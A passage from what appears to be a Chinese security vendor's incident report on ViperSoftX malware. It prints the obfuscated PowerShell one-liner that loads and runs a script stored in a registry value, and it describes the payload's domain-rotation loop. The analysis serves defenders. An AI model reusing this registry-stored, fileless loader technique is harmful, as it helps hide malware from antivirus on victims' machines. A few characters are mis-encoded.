取證過程

在了解了整個(gè)攻擊過程后，通過聚銘下一代智慧安全運(yùn)營中心（AISOC）的取證工具就可以比較輕松地掌握是哪個(gè)進(jìn)程執(zhí)行了這些域名請(qǐng)求。通過運(yùn)行取證工具，可以明顯地看到一個(gè)Powershell腳本正在執(zhí)行，如下圖所示：

圖5 腳本執(zhí)行命令截圖（通過取證工具獲?。?/span>

可以看出，這個(gè)PS腳本位于“C:\Windows\System32\”路徑下，打開它能看到如下內(nèi)容：

$hWoZcYCHbzD=[ScriptBlock];$OYjdrEDOZG=[string];$QSIVJlVifNVF=[char]; icm ($hWoZcYCHbzD::Create($OYjdrEDOZG::Join('', ((gp 'HKLM:\SOFTWARE\Khronos8OjteuI').'1NpPEtPF' | % { [char]$_ }))))

很明顯，這個(gè)PowerShell執(zhí)行的真正內(nèi)容在“HKLM:\SOFTWARE\Khronos8OjteuI”中，如下圖所示：

圖6 被植入在注冊(cè)表中的惡意程序腳本

可以看出受攻擊機(jī)器的注冊(cè)表信息已經(jīng)被惡意修改，通過解碼被寫入注冊(cè)表的內(nèi)容后，獲取到完整的惡意程序，其中關(guān)鍵部分如下：

圖7 請(qǐng)求惡意域名部分

這里使用了一個(gè)三重循環(huán)，故最多可以變換出50個(gè)不同的域名（即2*5*5），以躲避相關(guān)安全設(shè)備的檢測，但由于其使用的還是有限的域名池，因此在聚銘相關(guān)專業(yè)設(shè)備的幫助下能夠較為容易地偵測出來。

結(jié)論

聚銘網(wǎng)絡(luò)技術(shù)人員在現(xiàn)場取證的過程中了解到，客戶被攻擊主機(jī)其實(shí)安裝了多種殺毒軟件，但在執(zhí)行查殺時(shí)沒有發(fā)現(xiàn)任何報(bào)警，通過這一點(diǎn)可以充分說明ViperSoftX具有很強(qiáng)地隱蔽性（將其主要惡意部分放入了注冊(cè)表值），一般的防護(hù)手段難以及時(shí)發(fā)現(xiàn)。

目前還未準(zhǔn)確查明用戶是如何被植入ViperSoftX的，但通過對(duì)其執(zhí)行鏈的分析，推測可能是用戶在上網(wǎng)時(shí)下載了包含惡意內(nèi)容的軟件，從而使主機(jī)受到感染。因此小銘哥提醒大家，在上網(wǎng)時(shí)要切記網(wǎng)絡(luò)安全，請(qǐng)勿下載盜版軟件，避免因一時(shí)疏忽成為黑客攻擊的受害者。